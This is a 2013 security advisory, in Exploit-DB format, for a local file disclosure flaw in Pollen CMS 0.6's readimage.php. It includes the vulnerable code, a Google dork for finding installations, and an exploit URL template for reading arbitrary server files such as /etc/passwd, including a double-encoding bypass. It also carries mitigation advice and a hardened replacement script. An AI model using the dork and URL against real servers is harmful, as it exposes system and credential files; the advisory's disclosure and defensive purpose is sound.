Vendor: Pollen CMS
By: MizoZ
CVSS: 7.5 (HIGH)
CWE: 22 (Local File Disclosure)
Product Name: Pollen CMS
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: YES
Related CWE: N/A
CPE: a:pollencms:pollencms:0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Desktop 12.04
Year: 2013

Pollen CMS <= 0.6 - Local File Disclosure

The script core/lib/readimage.php in Pollen CMS 0.6 passes the attacker-controlled image parameter straight to is_file() and readfile(). The only check it performs is that the path names an existing file; nothing ties that path to the images directory, so an attacker can read any file the web server process is permitted to read (for example /etc/passwd) with a single crafted GET request whose image parameter carries the URL-encoded path. The script additionally calls urldecode() on a value that PHP has already decoded, so double-encoded paths are accepted as well, which defeats naive filtering of "../" sequences. The response is sent with a fixed Content-type of image/jpg, but its body is the verbatim contents of the requested file.

Mitigation:

Upgrade to a version of Pollen CMS that is not affected by this vulnerability (a patch exists). If upgrading is not immediately possible, restrict readimage.php so that it only serves files beneath the intended image directory: resolve the requested name with realpath(), require the result to start with the resolved image directory, and answer anything else with a 404. Do not rely on stripping "../" from the parameter; because of the extra urldecode(), encoded variants still reach the filesystem check.

Exploit-DB raw data:

# Title: Pollen CMS <= 0.6 - Local File Disclosure
# Google Dork: intext:"Powered by Pollen CMS"
# Date: 25 March 2013
# Exploit Author: MizoZ
# Vendor Homepage: pollencms.com (BROKEN)
# Software Link: https://code.google.com/p/pollencms/
# Version: 0.6
# Tested on: Ubuntu Desktop 12.04

-- File "[path]/core/lib/readimage.php"

<?php
// PHP has already URL-decoded $_GET; this second decode also accepts
// double-encoded input such as %252e%252e%252f.
$image = urldecode($_GET["image"]);
// The only check: does the path name an existing regular file?
// Nothing restricts it to the images directory, so an absolute path
// such as /etc/passwd passes as readily as a real image.
if (is_file($image)) {
    header("Pragma: no-cache");
    header("Expires: 0");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-cache, must-revalidate");
    header("Content-type: image/jpg");
    // Streams the file verbatim; the Content-type above is cosmetic.
    readfile($image);
} else {
    header("HTTP/1.0 404 Not Found");
}


-- Problem

   The script only verifies the existence of the given file.


-- Exploit
http://<server>/<path>/core/lib/readimage.php?image=[php urlencoded path to file]
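A hardened replacement for readimage.php, added here as an example of the fix the advisory's mitigation calls for; it is not Pollen CMS's own patch and has not been taken from the project. It assumes that images live in an images directory two levels above core/lib (adjust $imageDir to the real layout) and that the fileinfo extension is available for mime_content_type(); both are assumptions, not facts from the advisory.

```php
<?php
// Hardened readimage.php: added example, not Pollen CMS's own patch.
// Assumptions (not from the advisory): images live in $imageDir below,
// and only JPEG/PNG/GIF files should ever be served by this script.

// realpath() returns false if the directory is missing. Fail closed then,
// otherwise an empty prefix would match every path on the system.
$imageDir = realpath(__DIR__ . '/../../images');   // assumed location
if ($imageDir === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit;
}

/**
 * Resolve a user-supplied image name to a file inside $baseDir.
 * Returns [path, mime] on success or false. The original script called
 * is_file() on the raw parameter, which accepts any readable file on the host.
 */
function resolve_image($baseDir, $requested)
{
    // PHP already URL-decodes $_GET; the original's extra urldecode() let
    // double-encoded sequences such as %252e%252e%252f reach the filesystem.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return false;
    }
    // Resolve '..' and symlinks, then require the result to stay under $baseDir.
    // An absolute path like /etc/passwd becomes $baseDir//etc/passwd and
    // either does not exist or, if it does, still lands inside $baseDir.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return false;
    }
    if (strncmp($path, $baseDir . DIRECTORY_SEPARATOR, strlen($baseDir) + 1) !== 0) {
        return false;
    }
    // Decide the MIME type from file content, not from the extension,
    // and reject anything that is not an image.
    $allowed = ['image/jpeg' => true, 'image/png' => true, 'image/gif' => true];
    $mime = mime_content_type($path);
    if ($mime === false || !isset($allowed[$mime])) {
        return false;
    }
    return [$path, $mime];
}

$result = resolve_image($imageDir, isset($_GET['image']) ? $_GET['image'] : '');
if ($result === false) {
    // Same 404 for "outside the directory" and "not found": no oracle for
    // probing which files exist elsewhere on the host.
    header('HTTP/1.0 404 Not Found');
    exit;
}
list($path, $mime) = $result;
header('Pragma: no-cache');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT');
header('Cache-Control: no-cache, must-revalidate');
header('Content-Type: ' . $mime);      // the original sent the non-standard "image/jpg"
header('Content-Length: ' . filesize($path));
readfile($path);
```

The containment check is the part the original lacked: realpath() canonicalises traversal sequences and symlinks before the prefix comparison, so "../", encoded or not, cannot escape $imageDir. Checking the MIME type from content rather than the file name is a second, independent barrier; even a file that somehow ends up under the image directory is only served if it really is an image.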